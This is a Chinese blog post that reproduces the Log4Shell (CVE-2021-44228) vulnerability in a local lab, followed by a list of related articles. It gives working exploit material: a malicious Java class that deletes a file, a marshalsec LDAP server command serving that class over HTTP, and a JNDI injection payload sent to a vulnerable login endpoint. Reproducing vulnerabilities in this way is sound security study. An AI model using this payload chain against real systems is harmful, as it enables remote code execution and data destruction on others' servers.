log4j2远程代码执行漏洞复现

最新推荐文章于 2024-07-17 17:13:42 发布
最新推荐文章于 2024-07-17 17:13:42 发布
阅读量914 收藏 20
点赞数 23
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jsxztshaohaibo/article/details/136555501
版权
本文详细介绍了Log4j2的CVE-2021-44228漏洞,包括攻击原理、复现步骤以及注意事项,展示了如何在实际环境中利用该漏洞进行攻击并提供安全建议。
摘要由CSDN通过智能技术生成

原文地址:log4j2远程代码执行漏洞复现

一、背景

Log4j 2 是 Java 中应用非常广泛的一个日志框架,在 2021 年底,一个名为 CVE-2021-44228(也称为 Log4Shell)的严重漏洞被发现,该漏洞被CVSS评为10分最高级别。网络攻击者利用这个漏洞不需要服务器密码就可以访问并操作服务器,攻击方式非常简单,技术门槛低,危害极大。

受影响版本:Apache log4j2 2.0 - 2.14.1

下面先简单看一下攻击原理,然后直接开始操作。

 

二、攻击原理

假设现在有个网站,当用户登录时,正常请求路径如下:

如果应用服务端的登录接口中使用漏洞版本的log4j2打印请求参数的日志,就有可能被注入。如图所示:

 

 

三、复现步骤

以下代码已放在github仓库:https://github.com/wsliliang/log4j-vul

 

1. jdk版本:作者使用jdk1.8.0_161和1.8.0_42复现成功,1.8.0_301复现失败。

JDK 6u211、7u201、8u191之后:增加了com.sun.jndi.ldap.object.trustURLCodebase选项,默认为false,禁止LDAP协议使用远程codebase的选项,把LDAP协议的攻击途径也给禁了。

使用1.8.0_301的情况下,将trustURLCodebase属性设置为true也没复现成功,原因暂未深究。

System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");

2. 写一个springboot项目,模拟被攻击的应用服务端登录接口,接口中打印了userName参数日志,启动此项目。端口为8080。访问地址为http://127.0.0.1:8080/login

@ResponseBody@RequestMapping("login")public String listUser(String userName,String password) {    log.info("登录成功,用户名:{}", userName);    return "登录成功";}

3. 写一个在应用服务端执行的恶意代码,这里用删除一个服务器文件做演示,实际上可以使用反弹shell等做更多有害操作。编译这个类,生成class文件。

public class Exploit {    public Exploit() {        try {            File f = new File("c:/1.txt");            boolean delete = f.delete();            System.out.println("删除成功?" + delete);        } catch (Exception e) {            e.printStackTrace();        }    }
    public static void main(String[] argv) {        Exploit e = new Exploit();    }}

4. 启动一个http服务,配置使其可以访问上一步生成的.class文件,能使用http://127.0.0.1:4444/Exploit.class访问即可,注意4444是作者启动的http服务端口,可以根据自己情况修改,这个URL在下面会用到。

5. 启动LADP服务,具体作用可以参考上面的原理图。这里直接使用github上的代码GitHub - mbechler/marshalsec来运行ladp服务。如图所示:编译、运行启动。

 

 

运行ladp服务的命令:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer  "http://127.0.0.1:4444/#Exploit" 1389

上面命令中的http://127.0.0.1:4444/#Exploit是第四步中的地址,根据自己的情况可自行修改,1389是ladp服务默认端口,无需修改。

6. 在C盘建一个1.txt文件,使用恶意构造的参数访问登录接口。

POST http://localhost:8080/loginContent-Type: application/x-www-form-urlencoded
userName=${jndi:ldap://127.0.0.1:1389/Exploit}

 切换到ldap服务的控制台,可以看到日志,说明登录接口中的log4j已经访问ladp服务了。

 切换到http控制台,可以看到请求日志,说明应用服务器已经请求http服务器加载Exploit.class。

 

 在Exploit源码中debug,可以确认恶意代码已经执行,查看C盘下的文件,已经被成功删除,漏洞成功复现。

 

四、注意事项

  1. springboot项目默认会用logback日志,需要将logback依赖排除,并加上log4j的依赖,最好在日志打印处打断点,确认使用的是log4j的类。

  2. 恶意代码(即Exploit类)不能与应用服务代码放一起,否则会直接从应用服务器本地加载,不会从http服务请求恶意类。

  3. 确认jdk版本和log4j2版本符合条件。

 

jsxztshaohaibo
关注
  • 23
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
【网络安全---漏洞复现log4j2漏洞详细的复现和利用过程(CVE-2021-44228)
m0_67844671的博客
09-10 2520
Log4j2远程代码执行漏洞复现(cve-2021-44228),漏洞复现详细过程,cve-2021-44228,Log4j2
Log4j2漏洞复现(CVE-2021-44228)
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
Log4j2漏洞复现&原理&补丁绕过
最新发布
无问社区的博客
07-17 493
我tm都呕了,昨晚出了这个洞,在家复现半天没搞出来,然后凌晨快两点的时候成功了两次,然后又不行,然后睡了,贼jb真实。然后今天来公司随便搞了两下就成功了,唯一的变化就是换了台电脑,贼jb恐怖。经过测试就是jdk版本的问题。0x02 漏洞复现这里我一共使用了两个jdk版本8u202的情况比较特殊,其实我今天凌晨在家里用的也是8u202的版本,失败了。今天来公司也是用的8u202版本的jdk,成功了。
log4j2漏洞复现
weixin_51681694的博客
05-10 858
apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响,建议使用了相关版本的应用或者插件,尽快升级修补,做好相关方措施,避免造成不必要的损失受影响的组件。
Log4j2漏洞复现
weixin_51519028的博客
08-12 1万+
Apache Log4j2是 Apache软件基金会下的一个开源的基于 Java 的日志记录工具。Log4j2 是一个 Log4j 1.x 的重写,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于其优异的性能而被广泛的应用于各种常见的 Web 服务中。2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用${}......
log4j2漏洞复现与利用】
热门推荐
一个程序员
01-31 4万+
log4j2
log4j2原理分析及漏洞复现
HUANGXIN9898的博客
10-23 895
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶意请求,触发远程代码执行漏洞,从而获得目标服务器权限。在java中最常用的日志框架是log4j2和logback,其中log4j2支持。
Log4J2远程代码执行漏洞修复20211210.rar
12-13
Log4J2远程代码执行漏洞修复详解》 在IT安全领域,Log4J2远程代码执行漏洞(CVE-2021-44228)引起了广泛关注。此漏洞影响了全球无数使用Java日志框架Log4J2的应用程序,其严重性在于它允许攻击者通过注入特定的...
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
log4j远程执行漏洞,测试源码
12-22
标题提及的是“log4j远程执行漏洞”,这指的是Log4j 2框架中的一个严重安全漏洞,通常称为CVE-2021-44228,也被广泛称为“Log4Shell”漏洞。这个漏洞允许攻击者通过在日志记录语句中注入恶意代码来实现远程代码执行...
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
Log4j2 反序列化漏洞原理与复现
FisrtBqy的博客
05-15 4211
Log4j2 RCE漏洞原理与复现
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 8454
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
log4j2漏洞复现以及解决方案
学习不止境的博客
08-10 4457
log4j2漏洞解决 rmi远程调用 jndi注入 lookup
log4j远程代码执行漏洞复现
08-14
很抱歉,我不能提供最新漏洞复现过程。我作为一个 AI 助手,遵循道德准则和法律法规,不参与、支持或提供与安全漏洞相关的活动。漏洞复现涉及到潜在的非法行为和对他人系统的攻击,这是不被允许的。 如果你对最新...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值